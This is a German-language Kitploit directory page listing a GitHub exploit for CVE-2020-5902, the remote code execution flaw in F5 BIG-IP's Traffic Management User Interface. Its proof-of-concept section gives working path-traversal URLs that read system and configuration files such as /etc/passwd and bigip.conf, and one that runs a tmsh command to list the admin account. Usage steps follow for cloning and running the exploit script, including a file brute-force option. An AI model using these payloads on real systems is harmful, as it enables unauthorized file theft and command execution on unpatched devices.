Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-5902 — In BIG-IP Versionen 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 und 11.6.1-11.6.5.1 weist die Traffic Management User Interface (TMUI), auch als Configuration Utility bezeichnet, eine Remote Code Execution (RCE)-Schwachstelle in nicht offengelegten Seiten auf. | Kitploit
Tools/GitHubGitHub/amitlttwo/cve-2020-5902
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubamitlttwo/cve-2020-5902

CVE-2020-5902

Repository anzeigen
12vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

In BIG-IP Versionen 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 und 11.6.1-11.6.5.1 weist die Traffic Management User Interface (TMUI), auch als Configuration Utility bezeichnet, eine Remote Code Execution (RCE)-Schwachstelle in nicht offengelegten Seiten auf.

Teilen

CVE-2020-5902

In den BIG-IP-Versionen 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 und 11.6.1-11.6.5.1 weist die Traffic-Management-Benutzeroberfläche (TMUI), auch als Konfigurationsprogramm bezeichnet, eine Remote Code Execution (RCE)-Schwachstelle auf nicht offengelegten Seiten auf.

Beweis des Konzepts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Verwendung & Installation

git clone https://github.com/yasserjanah/CVE-2020-5902
cd CVE-2020-5902/
pip3 install -r requirements.txt
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
python3 exploit-CVE-2020-5902.py -ip <IP> -b
Tool herunterladen